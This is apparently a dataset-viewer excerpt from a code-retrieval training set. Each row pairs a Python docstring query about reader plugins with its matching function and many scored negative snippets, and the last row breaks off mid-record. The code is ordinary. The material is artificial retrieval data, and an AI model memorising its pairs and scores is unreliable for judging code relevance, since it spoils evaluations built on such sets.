query
stringlengths
9
3.4k
document
stringlengths
9
87.4k
metadata
dict
negatives
sequencelengths
4
101
negative_scores
sequencelengths
4
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
List the names of available readers Note that this will import all readers.
def names() -> Tuple[str, ...]: return plugins.list_all(package_name=__name__)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_readers():\n return all_readers", "def get_reader_funcs():\n return READERS", "def list_reads(cls) -> list:\n return [cls.FWREAD, cls.RVREAD];", "def namelist(self):\n return self._handle.getnames()", "def namelist(self):\n return self._handle.getnames()", "def list_contents(reader: UFOReader) -> list[str]:\n return reader.getImageDirectoryListing() # type: ignore", "def list_drivers(self):\n return self.ironic_client.driver.list()", "def namelist(self):\n return self._handle.namelist()", "def namelist(self):\n return self._handle.namelist()", "def initialize_file_readers():\n savefile_path = os.path.join(os.getcwd()+ \"/../data/\", SAVE_FILE)\n file_reader_list = []\n for file in os.listdir(savefile_path):\n file_reader = open(os.path.join(savefile_path,file), \"r\")\n file_reader_list.append({\"file_reader\": file_reader, \"last_read\": { \"word\": \"\", \"doc_score_list\": []}})\n return file_reader_list", "def short_docs(*readers: str) -> List[Tuple[str, str]]:\n if not readers:\n readers = names()\n\n return [(r, plugins.doc(__name__, r, long_doc=False)) for r in readers]", "def get_driver_names():\n return drivers.keys()", "def list_parsers(self, *args):\n print('==== Available parsing modules: ====\\n')\n for parser in sorted(self.parse_modules):\n print(self.parse_modules[parser].name.ljust(16) + \\\n ': ' + self.parse_modules[parser].desc)\n sys.exit(0)", "async def setReaders(self, eventID: str, readers: Iterable[str]) -> None:", "def get_list():\n\n print(f\"Корневой каталог: {config_tools.NAME_PATH}\")\n for dirpath, dirnames, filenames in os.walk(config_tools.NAME_PATH):\n # перебрать каталоги\n for dirname in dirnames:\n print(\"Каталог:\", os.path.join(dirpath, dirname))\n # перебрать файлы\n for filename in filenames:\n print(\"Файл:\", os.path.join(dirpath, filename))", "def object_readers(name, *, specify_reader=False):\n\treturn object_access('read', name, specify_reader)", "def names(self) -> list[str]:", "def names(self) -> List:\n ...", "def list(cls, standalone=True):\n\t\tif standalone:\n\t\t\treturn [i.name for i in cls]\n\t\telse:\n\t\t\treturn [i.name for i in FetcherEnum if issubclass(i.value, Fetcher)]", "def namelist(self):\n return []", "def read_all(self):\r\n pass", "def get_drivers():\n return [str(d) for d in drivers.values()]", "def keys(self):\n self._load()\n return list(self._file_openers.keys())", "def listPrinters(self):\n raise NotImplementedError(\"listPrinters not implemented\")", "def getListCreators(self):\n return _libsbml.ModelHistory_getListCreators(self)", "def available_tracers(self):\n return self.target.read_value(self.available_tracers_file).split(' ')", "def names():\n pass", "def list_requesters():\n from mephisto.core.local_database import LocalMephistoDB\n from tabulate import tabulate\n\n db = LocalMephistoDB()\n requesters = db.find_requesters()\n dict_requesters = [r.to_dict() for r in requesters]\n click.echo(tabulate(dict_requesters, headers=\"keys\"))", "def fd_list():\n try:\n fp = FdMultiController._path_generator(FdMultiController._db_registry_name)\n with open(fp, \"rb\") as pfile:\n names = pickle.load(pfile)\n return list(names)\n except OSError:\n return []", "def GetResourceNames(self):\r\n return [x.name for x in self.resources]", "async def readers(self, eventID: str) -> Iterable[str]:", "def on_readers_init(readers):\n for fmt in MarkdownExtReader.file_extensions:\n readers.reader_classes[fmt] = MarkdownExtReader", "def get_driver_list():\n return list(object_store.ObjectStorageDriver.registry.keys())", "def loaded_modules() -> List[str]:\n return PYSTAC_IO.keys()", "def get_resources(self):\n return []", "def get_names(self):\n return self.names", "def names(self):\n\t\treturn", "def _list_estimators():\n estimators = ['Natural', 'Davis-Peebles', 'Hewett', 'Hamilton', 'Landy-Szalay']\n return estimators", "def get_providers(self):\n return [\"Rainfall\", \"Average Rainfall Sea\", \"Average Rainfall Land\"]", "def run(self):\n logging.debug('List Available Recipes')\n if self.short:\n print(' '.join(pakit.recipe.RDB.names(desc=False)))\n return\n\n available = ['Program Description']\n available.extend(pakit.recipe.RDB.names(desc=True))\n\n msg = 'Available Recipes:'\n msg += PREFIX + PREFIX.join(available)\n print(msg)\n return msg", "def listBuilderNames():", "def listBuilderNames():", "def spark_list(provider):\n api.available(provider)", "def names(self):\n return self._names", "def names(self):\n return self._names", "def names(self):\n return self._names", "def do_list_availble_books(self, line):\n\t\tprint('\\nBooks in your current directory: \\n')\n\t\tfor i in os.listdir():\n\t\t\tif i.endswith('.bin'):\n\t\t\t\tprint(i)\n\t\tprint('\\n')", "def getNames(self) -> List[unicode]:\n ...", "def reservoir_names(self):\n return self._reservoirs", "def list_donors(self):\n return [donor.name for donor in self.donors]", "def names(self):\n return self.__names", "def _list_users(self):\n users = fileIO.load_json(\"users.json\")\n print(\"The list of users is as follows:\")\n for i in users:\n print(users[i][\"name\"])\n self._list_user_settings(users)", "def list_builders(self) -> List[str]:\n return sorted(_iter_builder_names(self._ns2data_dir))", "def gene_list_reader():\n \n relPath = \"data/genes_met_modelling_human.csv\"\n \n geneL = []\n with file_importer(relPath, encodeS = \"utf-8-sig\") as inpF:\n for inpLine in inpF:\n inpI = inpLine.strip(\"\\n'\").split(\".\")[0]\n if inpI not in geneL: geneL.append(inpI)\n \n return geneL", "def print_donor_list():\n print(data_base.donor_names)", "def get_names(self):\n return self.__names", "def get_rnames(self):\n for row in self._get_references_node():\n yield row['name']", "def listed_data(self, reader):\n result = []\n for line in reader:\n result.append(line)\n return result", "def return_names(self):\n return self.__name_list", "def reservoir_name_list(self):\n return list(self._node_reg.reservoir_names)", "def names(self) -> Sequence[str]:\n return pulumi.get(self, \"names\")", "def names(self) -> Sequence[str]:\n return pulumi.get(self, \"names\")", "def __dir__(self) -> list[str]:\n d = list(super().__dir__())\n d.extend([w.name for w in self._list if not w.gui_only])\n return d", "def get_camera_list():\n cameras = []\n modules = glob.glob(os.path.join(os.path.dirname(__file__), '*_camera.py'))\n for module in modules:\n m = import_module('.' + os.path.basename(module)[:-3], __name__)\n cameras.append({'name': os.path.basename(module)[:-10], 'description': m.__doc__}) \n return cameras", "def list(self):\n response = self._client.get('scanners/1/agents')\n return AgentList.from_json(response.text)", "def get_readings(self):\n\n return Readings(\n arduino=self.inputs.get_arduino_reading(),\n tapo=self.inputs.get_tapo_plug_reading(),\n garden=self.inputs.get_garden_co2_reading(),\n )", "def names(cls) -> List[str]:", "def getNames(self):\n return self._Names", "def getPeripheralNames(self):\n pass", "def list_drivers():\n return jsonify(drivers)", "def list_available_authenticators(avail_auths):\n output_lines = [\"Available authenticators:\"]\n for auth_name, auth in avail_auths.iteritems():\n output_lines.append(\" - %s : %s\" % (auth_name, auth.description))\n return '\\n'.join(output_lines)", "def get_providers(self):\n return [\"Temperature\", \"Average Temperature Sea\", \"Average Temperature Land\"]", "def cli_list(ctx):\n\n _list_spiders(ctx)", "def list_rights(self):\n if self.resource is None:\n self.resource = self.client.get_resource(self.href)\n rights = []\n if hasattr(self.resource, 'RightReferences') and \\\n hasattr(self.resource.RightReferences, 'RightReference'):\n for right in self.resource.RightReferences.RightReference:\n rights.append({'name': right.get('name')})\n return rights", "def names(self):\n if not self.extensions:\n self.discover()\n\n names = list(self.builtins.keys())\n names += self.extensions.keys()\n\n return sorted(names)", "def load_names() -> list:\n with open(Path(\"bot/resources/pride/drag_queen_names.json\"), \"r\", encoding=\"utf8\") as f:\n return json.load(f)", "def getOriNames( self ):\n\n if self.oriNames:\n return self.oriNames.keys()\n\n n = self.adb.get( \"nRsfs\" )\n for indx in xrange( n ):\n name = self.adb.get( \"rsfName\", indx )\n self.oriNames[ name ] = indx\n\n return self.oriNames.keys()", "def get_all_books():\n for n, book in enumerate(BOOKS, 1):\n state = 'YES' if book['read'] else 'NO'\n print(\n f\"{[n]} - {book['name'].capitalize()}, by {book['author'].capitalize()} - Read: {state}\"\n )", "def get_list_of_names():\n conn = r.connect(host=HOST, port=PORT, db=DB)\n names = r.table(FINGERPRINT_TABLE)[\"name\"].run(conn)\n return list(names)", "def list(self):\n\n result = []\n for i in self.bots:\n result.append(i.name)\n return result", "def get_crl_gnames(self):\n urls = ['uri:' + u for u in self.crl_urls]\n return self.load_gnames(urls)", "def listRepositories(self):\n return self.mini_catalog.listRepositories()", "def get_scraper_list(scraper_dir):\n scraper_files = [name for name in os.listdir(scraper_dir) if name.endswith('.py')]\n scrapers = []\n for filename in scraper_files:\n scr = filename.replace('.py', '')\n scr_inst = SourceFileLoader(fullname=scr, path='{0}/{1}'.format(scraper_dir, filename)).load_module()\n if hasattr(scr_inst, \"get_deals\"):\n scrapers.append(scr_inst)\n\n return scrapers", "def list(self):\n resources = self._os_resource_manager.list()\n resource_list = []\n for resource in resources:\n resource_list.append(self._resource_class(id=resource.id,\n name=resource.name))\n return resource_list", "def read(self) -> List[str]:\n pass", "def ls(self):\n files = self.drive.files().list().execute().get(\"files\", [])\n for f in files:\n print(f[\"name\"], f[\"mimeType\"])", "def get_init_all_names(self) -> list[str]:\n names = {self.client.name, self.client.alias_name}\n if self.service_resource:\n names.add(self.service_resource.name)\n names.add(self.service_resource.alias_name)\n for waiter in self.waiters:\n names.add(waiter.name)\n for paginator in self.paginators:\n names.add(paginator.name)\n\n result = list(names)\n result.sort()\n return result", "def list():\n\n click.secho('List of libraries in SJSU-Dev2\\n', fg='white', bold=True)\n package_registry = GetListOfSJSUDev2Repos()\n library_list = [f'{x : <20}: {package_registry[x]}'\n for x in package_registry if x.startswith('lib')]\n print('\\n'.join(library_list))", "def __dir__(self):\n return [\n \"get\",\n \"list\",\n \"delete\",\n \"examples\",\n \"wait_for_state\",\n \"refresh\",\n \"install\",\n ]", "def get_readable_inners(self):\n return self.value", "def notifiers(self):\n return self.registry.keys()", "def list():\n\n\treturn netifaces.interfaces()", "def read_wks(self):\n list = []\n with open(self.wks_file) as wks_file:\n fieldnames = ['name', 'ip', 'port']\n routers = csv.DictReader(wks_file, fieldnames=fieldnames)\n for router in routers:\n list.append(router)\n return list", "def _list_of_availability_strings():\n names = [availability.name for availability in Availability]\n return names", "def read_utilities(self):\n self.progs = self.lnp.read_utilities()\n self.update_autorun_list()", "def list_clients(): # Listar clientes\n global clients\n\n for idx, client in enumerate(clients):\n print('{}: {}'.format(idx, client))", "def getRaceList(self):\n\t\tl = []\n\t\tfor r in self.races:\n\t\t\tl.append(r.name)\n\t\treturn l", "def get_names(self):\n return [doc['name'] for doc in self.vocab]", "def do_list(client, args):\n\trepos = client.repos.list(args.user)\n\tprint '%s has the following repositories:' % args.user\n\tprint 'Name - Description'\n\tfor repo in repos:\n\t\tprint '%s - %s' % (repo.name, repo.description)", "def resource_names(self):\n return self._resource_names" ]
[ "0.7477495", "0.64536035", "0.63747376", "0.5518427", "0.5518427", "0.5415075", "0.5403663", "0.5381984", "0.5381984", "0.53160554", "0.5299087", "0.527088", "0.52304727", "0.52028954", "0.5191611", "0.5185727", "0.51809806", "0.5179094", "0.5153803", "0.51439035", "0.513742", "0.5125775", "0.5111741", "0.5107429", "0.51011485", "0.51009417", "0.50834286", "0.50811934", "0.5065152", "0.5060945", "0.5060056", "0.5047146", "0.5031644", "0.5028029", "0.5024121", "0.50160456", "0.50140953", "0.5013292", "0.5009855", "0.5006149", "0.49994984", "0.49994984", "0.49933106", "0.49773976", "0.49773976", "0.49773976", "0.49767822", "0.49715772", "0.49703357", "0.49690422", "0.49511793", "0.49469292", "0.49430314", "0.4936938", "0.4936594", "0.49301526", "0.49224576", "0.4922313", "0.4912036", "0.49046078", "0.48790976", "0.48790976", "0.4867614", "0.4866823", "0.48645806", "0.4862834", "0.48556614", "0.48499855", "0.48475945", "0.48445985", "0.48328635", "0.48296928", "0.482911", "0.48259285", "0.48210406", "0.48122162", "0.48043987", "0.47996515", "0.47936463", "0.47920805", "0.4791969", "0.47883222", "0.47875166", "0.47868538", "0.47858447", "0.4781238", "0.47810438", "0.478037", "0.4777324", "0.47700268", "0.47692105", "0.4762983", "0.47623897", "0.4751298", "0.47510615", "0.4749781", "0.47495976", "0.47439003", "0.47438976", "0.47396666" ]
0.47953343
78
Check whether the given reader exists
def exists(reader_name: str) -> bool: return plugins.exists(package_name=__name__, plugin_name=reader_name)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _haveReadLocks(self): \n readLockFileName = ReadLock.fileName\n for name in os.listdir(self.dir):\n if name.startswith(readLockFileName):\n return True\n return False", "def exists(identifier, network):\n foo = next(load(identifier, network), None)\n return foo is not None", "def checkExist(self,fname,status):\n\n if (self.status == \"r\"):\n # Checks to see if it exists for reading\n # Which means it must be present\n\n if (not (os.path.exists(self.fname))):\n print(f\"Couldn't open input file: {self.fname}\")\n return False\n else:\n # Check to see if exists for reading\n # (i.e. must not exist)\n if (os.path.exists(self.fname)):\n print(f\"File {self.fname} already exists.\")\n return False\n\n return True", "def checkExist(self,fname,status):\n\n if (self.status == \"r\"):\n # Checks to see if it exists for reading\n # Which means it must be present\n\n if (not (os.path.exists(self.fname))):\n print(f\"Couldn't open input file: {self.fname}\")\n return False\n else:\n # Check to see if exists for reading\n # (i.e. must not exist)\n if (os.path.exists(self.fname)):\n print(f\"File {self.fname} already exists.\")\n return False\n\n return True", "def entry_exists(title):\n try:\n f = default_storage.open(f\"entries/{title}.md\")\n return True\n\n except FileNotFoundError:\n return False", "def test_read_before_connected(connection, reader, loop):\n value = loop.run_until_complete(connection.read())\n assert not value\n assert not reader.used", "def check_access(ident):\n resource = data_service.resource_load(uniq = ident)\n log.debug('Result from the database: %s'%resource)\n if resource is None:\n return False\n return True", "def does_resource_exist(resource):\n try:\n resource.load()\n return True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'ValidationError':\n return False\n else:\n raise e", "def _object_exists(name):\n conn = sqlite3.connect('/dev/input')\n try:\n cur = conn.cursor()\n sql = 'SELECT ROWID FROM object WHERE name=? AND deleted=0'\n cur.execute(sql, (name, ))\n result = cur.fetchall()\n return len(result) > 0\n finally:\n conn.close()", "def object_exists(self, fname):\n return False", "def object_exists(self, fname):\n return self.object_exists", "def is_file_exists(self):\n pass", "def object_exists(self, fname):\n return True", "def check_handle(handle):\n return os.path.isfile(get_path_filename(handle))", "def check_if_row_already_loaded(self, row, file_name):\n\t\tquery = \"SELECT count(*) FROM \" + TABLE_NAME + \" WHERE GLOBALEVENTID = \" + \"'\" + row[0] + \"'\"\n\n\t\ttry:\t\t\t\n\t\t\t# print query\n\t\t\tcursor = self.connection.cursor()\n\t\t\texecuted_cur = cursor.execute(query)\n\n\t\t\tif executed_cur:\t\t\t\n\t\t\t\tresult_cur = cursor.fetchall()\n\t\t\t\tfor row in result_cur:\n\t\t\t\t\tif int(row[0]) > 0:\n\t\t\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tprint \"[e] Something wrong with execution.\"\n\t\texcept Exception, e:\n\t\t\tprint '[e] Exeption: %s while processing \"%s\" file in method %s' % \\\n (str(e), DATA_DIRECTORY + '/' + file_name, \"check_if_row_already_loaded\")\n\t\t\tprint '\\t[q] Query that caused exception \\n %s' % (query)\n\n\n\t\treturn False", "def _check_row_exists(self, pk):\n session = self.session_factory()\n exists = session.query(PipelineRun).filter_by(id=pk).first()\n session.close()\n if exists:\n return True\n return False", "def ResourceExists(resource_name, search_user_paths=True):\n try:\n ResourcePath(resource_name, search_user_paths)\n return True\n except ResourceNotFound:\n return False", "def file_exists(path):\n\n try:\n with open(path):\n return True\n except IOError:\n return False", "def test_read_not_interested(self):\n try:\n self.reader.read(self.books[2], 0, 0)\n self.fail(\"Readed book not interested\")\n except AssertionError:\n pass", "def test_exists(self):\n d = self._examineOrSelect()\n self._response(b'* 3 EXISTS')\n self.assertEqual(\n self.successResultOf(d),\n {'READ-WRITE': False, 'EXISTS': 3})", "def exist(self):", "def read(reader: BitStreamReader, _index: int) -> bool:\n\n return reader.readBool()", "def _file_exists(name):\n try:\n f = open(name)\n f.close()\n return True\n except IOError:\n return False", "def resource_exists(uri: Optional[str]) -> bool:\n\n if uri is None:\n return True\n\n # TODO Replace after finding way to pass custom fs through FireO validator\n if uri.startswith(\"gs://\"):\n return True\n\n else:\n # Get file system\n fs, uri = url_to_fs(uri)\n\n # Check exists\n if fs.exists(uri):\n return True\n\n return False", "def exists(self):\n return True", "def exists(self):\n return True", "def check(self):\n # validate contents still to do - for now just check if it exists\n return os.path.exists(self.getDefaultDatabaseConnectionParameter()['path'])", "async def exists(self, tag_name):\n try:\n if await self.get_id(tag_name):\n return True\n except RtbDoesntExists:\n return False", "def exists (self, uuid):\n return self.read (uuid) is not None", "def get_reader(reader_type):\n return reader_dict.get(reader_type, None)", "def get_check_read(dbname, nrows=False, complete=True):\n db = get_db(dbname, complete=complete)\n if db is None:\n raise KeyError(\"no such database\")\n if not has_read_access(db):\n raise ValueError(\"may not read the database\")\n set_nrows(db, targets=nrows)\n return db", "def ResourceExists(self, name):\n pass", "def test_read_different_location(self):\n try:\n self.reader.read(self.books[1], 0, 1)\n self.fail(\"Readed book was not in the library\")\n except AssertionError:\n pass", "def exists(self, path):", "def exists(self, key):\n result = self.wrapped_db.exists(key)\n self.access_logs.reads[key] = self.wrapped_db.get(key) if result else None\n return result", "def exists():\n\treturn os.path.exists('data/strmr.db')", "def exists(self, path):\n return DataSource.exists(self, self._fullpath(path))", "def check_if_exists(self, bookID):\n query = f\"\"\"SELECT * from {TABLE} WHERE bookID = '{bookID}';\"\"\"\n res = self.cursor.execute(query)\n\n if self.cursor.fetchall():\n return True\n else:\n return False", "def line_exists():\n global _current_line\n return _current_line is not None", "def is_reader():\n\ttry:\n\t\temail = decode_token(request.headers.get('Authorization')[7:])[\"identity\"]\n\n\t\tcurrent_admin = Reader.query.filter_by(email=email).first()\n\texcept IndexError:\n\t\treturn bad_request(\"User is not an admin\")\n\n\tif current_admin is None:\n\t\treturn bad_request(\"User is not an admin\")", "def resourceExists(self, uri):\r\n return uri in self.cache", "def test_read_disconnected(connection, reader, schedule, flush, loop):\n schedule(connection.connect(), connection.disconnect())\n flush()\n value = loop.run_until_complete(connection.read())\n assert not value\n assert not reader.used", "def book_exist(author, title, edition):\n book = Book.query.filter_by(\n author=author,\n book_title=title,\n edition=edition).first()\n if book:\n return True\n return False", "def exists(redis_client: Redis, root_path) -> bool:\n return bool(redis_client.exists(root_path))", "def check_file_exist(self):\n return False", "def supplier_exist(supplier_name: str) -> bool:\n\n # Open a new connection\n db, cursor = db_connector.cursor()\n\n query = \"select name from supplier where name = '{}'\".format(supplier_name)\n cursor.execute(query)\n data = cursor.fetchall()\n db.disconnect()\n if len(data) == 0:\n return False\n return True", "def _exists (self):\n cursor = self._exec (self.select)\n return bool (cursor.fetchall ())", "def __contains__(self, username):\r\n if self.db == None:\r\n raise AssertionError(\"DB not open\")\r\n\r\n self.lock.acquire()\r\n try:\r\n return self.db.has_key(username)\r\n finally:\r\n self.lock.release()", "def exists(self):\r\n return os.path.exists(self.full_path)", "def check_exist(filename, status):\n\n if (status == \"r\"):\n # check to see if it exists for reading\n # (i.e. must be present)\n if (not (os.path.exists(filename))):\n print(f\"Couldn't open input file: {filename}.\")\n return False\n else:\n # check to see if it exists for writing\n # (i.e. must not exist or clobber=yes)\n if (os.path.exists(filename)):\n if (status == \"w\"):\n return True\n else:\n return False\n\n return True", "def exists(self):\n return self._repository is not None", "def fileExists(fileName):\n try:\n fileOpen = open(fileName, 'rt')\n fileOpen.close()\n except FileNotFoundError:\n return False\n else:\n return True", "def __is_csv(self):\n try:\n # just open to check if there is the file\n with open(self.__csv_file_name, 'r') as file:\n file.close()\n return True\n # if it do not exists the exception will returns false\n except IOError:\n return False", "def file_exist() -> bool:\n pass", "def canread(self):\n return False", "def exists(self) -> bool:\n try:\n result = self.get()\n except KeyError:\n return False\n return True", "def _checkDB(self, userID, key):\r\n # TODO: Why not return True directly instead all lines will be read\r\n # TODO: Should this be deferred to a separate thread due to flock,\r\n # which is a blocking call?\r\n found = False\r\n with open(self._dbFile, 'r') as bridgefile:\r\n fcntl.flock(bridgefile.fileno(), fcntl.LOCK_EX)\r\n lines = bridgefile.readlines()\r\n for line in lines:\r\n g = line.split(':')\r\n if g[0] == userID and str(g[1].rstrip()) == str(key):\r\n found = True\r\n return found", "async def _exists(self, key):\n with await self._connect() as redis:\n exists = await redis.exists(key)\n return True if exists > 0 else False", "def is_resource(self, path):\n # type: (Text) -> bool\n raise FileNotFoundError", "def check_exist(self):\n helper.RbdImageOperator._check_rbd_image(self.real_path)", "def exists(self, datadir):\n return False", "def record_exists(user):\n cnx = create_connection()\n cursor = cnx.cursor()\n\n query = \"SELECT * FROM \" + USAGE_TABLE['name'] + \" WHERE \" + USAGE_TABLE['relational_column'] + \" = '\" + user + \"'\"\n\n try:\n cursor.execute(query)\n except mysql.connector.Error as e:\n cursor.close()\n cnx.close()\n if e.errno == errorcode.ER_BAD_TABLE_ERROR:\n print(\"Table doesn't exist!\")\n else:\n print(e)\n return\n\n rows = cursor.fetchall()\n cnx.close()\n cursor.close()\n\n if len(rows):\n return True\n else:\n return False", "def exist(self):\n return self.file_path.exists()", "def test_obtain_read_lock_with_no_existing_locks(self):\n\n transaction = Transaction(\"T1\", TransactionType.READ_WRITE, 1)\n instruction = Instruction(\"R(T1, x2)\")\n self.assertEquals(instruction.variable_identifier, \"x2\")\n variable = self.data_manager.variables[\"x2\"]\n\n self.assertTrue(variable.readable)\n self.assertFalse(\"x2\" in self.data_manager.locks)\n\n value = self.data_manager.obtain_read_lock(transaction, instruction)\n self.assertEquals(len(self.data_manager.locks), 1)\n self.assertTrue(value)", "def notebook_exists(self, name, path=''):\n\n\t\tos_path = self._get_os_path(name, path=path)\n\t\treturn key_exists(self.bucket, os_path)", "def isDataSourceReadable(self):\r\n\r\n readable = True\r\n start, stop = self.getReadParameters(\\\r\n numpy.array(0, dtype=numpy.int64), self.chunk_size)\r\n try:\r\n self.data_source.read(start, stop)\r\n except tables.HDF5ExtError:\r\n readable = False\r\n print(translate('Buffer',\r\n \"\"\"\\nError: problems reading records. The dataset seems \"\"\"\r\n \"\"\"to be compressed with the {0} library. Check that it \"\"\"\r\n \"\"\"is installed in your system, please.\"\"\",\r\n 'A dataset readability error').\\\r\n format(self.data_source.filters.complib))\r\n\r\n return readable", "def dataset_exists(dataset_reference, client):\n from google.cloud.exceptions import NotFound\n\n try:\n client.get_dataset(dataset_reference)\n return True\n except NotFound:\n return False", "def Exists(self, path: str) -> bool:\n ...", "def hasContents():", "def exists(self):\r\n try:\r\n self.refresh()\r\n except:\r\n return False\r\n return True", "def exists(self):\r\n return bool(self.bucket.lookup(self.name))", "def test_project_reader(project):\n if is_server_administrator():\n return True\n if is_project_administrator(project):\n return True\n if is_project_writer(project):\n return True\n if is_project_reader(project):\n return True\n return False", "def object_exists(self, name: str):\n file_path = self.__get_file_path(name)\n return os.path.exists(file_path)", "def race_entry_exists(self, race_id):\n try:\n self.consolidated_db.data.loc[race_id] # Throws a KeyError if no entry is in the dataframe.\n return True\n except KeyError:\n return False", "def has_already_cover(record):\n cover_metadata = record.get(\"cover_metadata\", {})\n return cover_metadata.get(\"ISBN\", False) or cover_metadata.get(\n \"ISSN\", False\n )", "def get_reader(fn):\n if is_bed(fn):\n return BedReader(fn)\n elif is_vcf(fn):\n return VcfReader(fn)\n else:\n raise ValueError(\"Could not get reader for %s\" % fn)", "def is_present(self):\n try:\n self.read_binary(0, 2)\n return True\n except:\n return False", "def db_exists(self, db):\n # HDF5 is file based\n return os.path.isfile(db)", "def component_owner_reader(path):\n with open(path, 'rt') as f:\n component_reader = csv.DictReader(f)\n\n for row in component_reader:\n if row.get('Owner name') is not \"NONE\":\n yield row", "def verify_key_data_exists(key, file_name):\n try:\n with open(file_name, 'r') as file:\n lines = file.readlines()\n for line in lines:\n row = [r.strip() for r in line.split(',')]\n if row[0] == key:\n # row[3] has file name\n with open(row[3], 'r') as rfile:\n if rfile.read():\n return True\n return False\n except Exception as file_error:\n raise file_error", "def exists(self, _uri):\n #print(\"%s %s\"%(_uri))\n\n\n #-------------------- \n # Query logged files before checking\n #-------------------- \n if (os.path.basename(_uri) in self.fileDict):\n return True\n\n\n\n #-------------------- \n # Clean string\n #-------------------- \n xnatUrl = Xnat.path.makeXnatUrl(self.host, _uri)\n parentDir = Xnat.path.getUriAt(xnatUrl, 'files')\n for i in self.__getJson(parentDir):\n if os.path.basename(xnatUrl) in i['Name']:\n return True \n return False", "def __has_repo(repo_name):\n\n dtf_db = sqlite3.connect(DTF_DB)\n cur = dtf_db.cursor()\n\n sql = ('SELECT id '\n 'FROM repos '\n \"WHERE repo_name='%s' \"\n 'LIMIT 1' % repo_name)\n\n cur.execute(sql)\n\n return bool(cur.fetchone() is not None)", "def entry_exist_bool(dbfile, link):\n\n conn = sqlite3.connect(dbfile)\n c = conn.cursor()\n query = \"\"\"\n SELECT link FROM bringatrailer WHERE link='{}'\n \"\"\".format(link)\n c.execute(query)\n result = c.fetchall()\n if not result:\n return False\n else:\n return True", "def is_book_exist(self, book_info):\n for type, link in book_info.links.items():\n try:\n bookfile = BookFile.objects.get( link_hash = md5(link).hexdigest() )\n books = bookfile.book_set.all()\n if books:\n return True, books[0]\n except BookFile.DoesNotExist:\n continue\n try:\n book = Book.objects.get(author__name=book_info.authors, title=book_info.title)\n return True, book\n except Book.DoesNotExist:\n continue\n return False, None", "def entry_exists(conn, aid):\n # Select row with mid\n cursor = conn.execute(\"SELECT * FROM AffirmedAssignments WHERE aid=?\", (aid,))\n row = cursor.fetchone()\n\n if row is None:\n # Assignments entry does not exist.\n return False\n\n # Assignments entry exists\n return True", "def file_checker(file_name):\n if os.path.islink(file_name):\n print \"Crypto device Symlink %s exists\" % file_name\n return True\n else: \n try:\n with open(file_name):\n print \"File %s exists\" % file_name\n return True\n except IOError:\n print \"File %s does not exists\" % file_name\n return False", "def isExist(data):\n return True/False", "def exists(self):\n self.cursor.execute(f\"\"\"\n SELECT 1\n FROM {self.table_name}\n WHERE {self.lookup_type}='{self.word}'\n \"\"\")\n return True if self.cursor.fetchone() else False", "def wantsReadEvent(self):\r\n if self.result != None:\r\n return self.result == 0\r\n return None", "def has_table(self, name: str) -> bool:\n try:\n self.execute(\"select * from {table} limit 1\", name)\n return True\n except sqlite3.OperationalError:\n return False", "def _check_file(self, name):\n self.assertTrue(os.path.exists(name), \"Could not find table %s.\" % name)", "def readable(self):\n self._check_not_closed()\n return False", "def row_exists(self, key, transaction_id):\n return key in self.rows and \\\n self._get_history(transaction_id, key).node_exists()", "def exists(self) -> bool:\n return self._file_exists()", "def is_file_exist(self):\n return os.path.isfile(os.path.join(self.output_path, 'amr_corpus_ext.pickle'))", "def exists(self):\n return os.path.exists(self.sensorpath)", "def like_exists(db, filename, user):\n cur = db.cursor()\n sql = \"\"\"\n select * from likes where filename=? and usernick=?;\n \"\"\"\n cur.execute(sql, (filename, user))\n all = cur.fetchall()\n if len(all) > 0:\n return True\n else:\n return False", "def exists(self):\n\t\tif self.hasUdim:\n\t\t\treturn len( self.udimPaths ) != 0\n\t\treturn super( textureFile, self ).exists", "def test_from_reader_both_given(self):\n pandoc_default_files = [\n os.path.join(\n TEST_DEFAULT_FILES_PATH, \"from_reader_both_given.yaml\"\n )\n ]\n\n settings = get_settings(PANDOC_DEFAULT_FILES=pandoc_default_files)\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"valid_content.md\")\n\n with self.assertRaises(ValueError) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n (\n \"Specifying both from and reader is not supported.\"\n \" Please specify just one.\"\n ),\n message,\n )", "def exists(profile, name):\n result = fetch_by_name(profile, name)\n return len(result) > 0" ]
[ "0.6164184", "0.5904849", "0.58638656", "0.58638656", "0.5770025", "0.575396", "0.56898904", "0.5686118", "0.56144536", "0.56005126", "0.5580309", "0.5566034", "0.5542885", "0.55397743", "0.5537704", "0.55220896", "0.5509569", "0.54929805", "0.549026", "0.54900736", "0.54776174", "0.54772145", "0.5458027", "0.5456437", "0.5438363", "0.5438363", "0.5433666", "0.54315096", "0.54271394", "0.54217505", "0.5419295", "0.5412132", "0.54115313", "0.5401336", "0.540011", "0.53817284", "0.537891", "0.5348365", "0.53455675", "0.53445536", "0.53423405", "0.53145504", "0.530937", "0.53090644", "0.53039986", "0.52967757", "0.5291968", "0.5291525", "0.52891445", "0.5287744", "0.527682", "0.5276578", "0.527116", "0.52703166", "0.52698517", "0.52697486", "0.5269036", "0.52576154", "0.52506953", "0.524705", "0.5244999", "0.5241969", "0.52290744", "0.52137315", "0.5212476", "0.5198716", "0.5198127", "0.51966804", "0.5186386", "0.51829743", "0.5177783", "0.5170479", "0.51574844", "0.5149605", "0.51470673", "0.5142331", "0.51416296", "0.5139342", "0.5133798", "0.5130544", "0.51267874", "0.5122803", "0.51205087", "0.511588", "0.51146626", "0.51043415", "0.50985503", "0.50962424", "0.509383", "0.5089747", "0.5081151", "0.5080604", "0.5073594", "0.50723064", "0.50700486", "0.5065926", "0.5061504", "0.5056844", "0.5052842", "0.5051808" ]
0.66304976
0
Get one line documentation for readers If no readers are specified, documentation for all available readers are returned.
def short_docs(*readers: str) -> List[Tuple[str, str]]: if not readers: readers = names() return [(r, plugins.doc(__name__, r, long_doc=False)) for r in readers]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
